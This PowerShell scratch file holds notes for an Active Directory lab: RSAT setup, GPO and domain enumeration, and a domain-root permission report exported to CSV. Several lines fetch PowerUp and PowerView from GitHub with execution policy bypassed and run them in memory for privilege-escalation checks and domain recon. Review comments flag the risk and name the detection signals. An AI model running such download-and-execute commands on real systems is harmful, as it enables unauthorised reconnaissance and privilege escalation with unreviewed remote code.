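# Setup
#
# Scratch notes for listing Group Policy Objects and domain information in the
# pets.local lab domain. The list markers from the paste rendering have been
# dropped and the free-text marker lines turned into comments so that every
# non-comment line is a PowerShell statement.
#
# Reference: https://github.com/FuzzySecurity/StandIn#list-gpos
# Console transcript (prompt included, so kept as a comment):
#   C:\Users\win11user\Downloads\StandIn_v13_Net35_45> .\StandIn_v13_Net35.exe --gpo
#
#
# Ensure IPv4 and IPv6 on the joined computer point to AD
# (presumably the DNS server setting; confirm).
# Add-Computer -DomainName "Domain Name" -Credential "Domain Username"
# Import-Module ActiveDirectory

# List the RSAT capabilities with their install state. The pasted line was cut
# off at 'Stat'; the property on the returned objects is 'State'.
Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property DisplayName, State
# Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online

# Install the AD DS / LDS tools and the Group Policy management tools.
# Typographic quotes and dashes from the paste are replaced with ASCII ones.
Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
Add-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
# Get-GPOReport -All -Domain "corp.contoso.com" -Server "HYD-DC1" -ReportType XML -Path "C:\GPOReports\GPOReportsAll.xml"

# NOTE(review): every 'IEX (New-Object Net.WebClient).DownloadString(...)' line
# below fetches a script from the head of a branch (master or dev) of a GitHub
# repository and evaluates it in memory with -nop -exec bypass. Whatever that
# branch holds at download time is what runs: nothing is pinned, hashed or
# reviewed, and the repository owner (or anyone who compromises the account)
# controls the code executed on this host. For authorised testing, work from a
# local copy that has been read and pinned to a commit
# (<REVIEWED_COMMIT_SHA> - placeholder, not a real value).
# Detection side: this is a well-known download-and-execute pattern. AMSI and
# PowerShell Script Block Logging (event ID 4104) see the downloaded script
# text, and process command-line logging shows the '-nop -exec bypass' launch.

# Works
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/jessefmoore/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks"

# Works
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"

#WWWWWWWWWWWWWWWWWh
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetGPO"

# Good (this marker was a bare word in the paste)
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-NetDomain -Domain pets.local"

# New (this marker was a bare word in the paste)
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetDomain -Domain pets.local"
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGPO"

# The RSAT GroupPolicy module installed above covers the same GPO listing
# without downloading anything:
#Get-GPO -All -Domain "corp.contoso.com"
# Get-GPO -Domain pets.local -All
#powershell -nop -exec bypass -c "IEX (New-Object #Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1'); Get-DomainGPO"
#
# As written, the next line is only a string literal: PowerShell echoes it and
# executes nothing.
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
#
#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-#SECURITY/Empire/master/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO | Get-DomainPolicy"
#
#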
# Domain root permission report.
# Reads the access entries from the nTSecurityDescriptor of the domain object,
# adds the domain name plus readable names for the ObjectType and
# InheritedObjectType GUIDs to each entry, and exports the result to a CSV.
# $Domain, $ADDomainInfo, $DomainDC, $ForestDNSName, $ReportDir and $TimeVal,
# and the Get-NameForGUID function, are defined outside this excerpt.
# NOTE(review): the CSV lists who holds which rights on the domain root, so it
# is sensitive; keep $ReportDir readable only by the people doing the review.
Write-Output "Gathering Domain Permissions for $Domain"

$ForestDomainObjectData = Get-ADObject $ADDomainInfo.DistinguishedName -Properties * -Server $DomainDC
$ForestDomainObjectSecurityData = $ForestDomainObjectData.nTSecurityDescriptor.Access

$ForestDomainObjectPermissions = @()
foreach ($AccessRule in $ForestDomainObjectSecurityData) {
    # Ordered so the GUID lookups run, and the properties are added, in the
    # same sequence as before: Domain, ObjectTypeName, InheritedObjectTypeName.
    $ExtraProperties = [ordered]@{
        Domain                  = $Domain
        ObjectTypeName          = Get-NameForGUID $AccessRule.ObjectType -ForestDNSName $ForestDNSName
        InheritedObjectTypeName = Get-NameForGUID $AccessRule.InheritedObjectType -ForestDNSName $ForestDNSName
    }
    foreach ($PropertyName in $ExtraProperties.Keys) {
        # -Force overwrites a note property of the same name if one exists.
        Add-Member -InputObject $AccessRule -MemberType NoteProperty -Name $PropertyName -Value $ExtraProperties[$PropertyName] -Force
    }
    [array]$ForestDomainObjectPermissions += $AccessRule
}

$ForestDomainObjectPermissionFile = $ReportDir + "\TrimarcADChecks-DomainRootPermissionReport-$Domain-$TimeVal.csv"

# Column order of the exported report.
$ReportColumns = @(
    'IdentityReference', 'ActiveDirectoryRights', 'InheritedObjectTypeName', 'ObjectTypeName',
    'InheritanceType', 'ObjectFlags', 'AccessControlType', 'IsInherited',
    'InheritanceFlags', 'PropagationFlags', 'ObjectType', 'InheritedObjectType'
)

$ForestDomainObjectPermissions |
    Sort-Object IdentityReference |
    Select-Object $ReportColumns |
    Export-Csv $ForestDomainObjectPermissionFile -NoTypeInformation

Write-Host "Active Directory Domain Permission report saved to the file $ForestDomainObjectPermissionFile" -ForegroundColor Cyan
Write-Host ""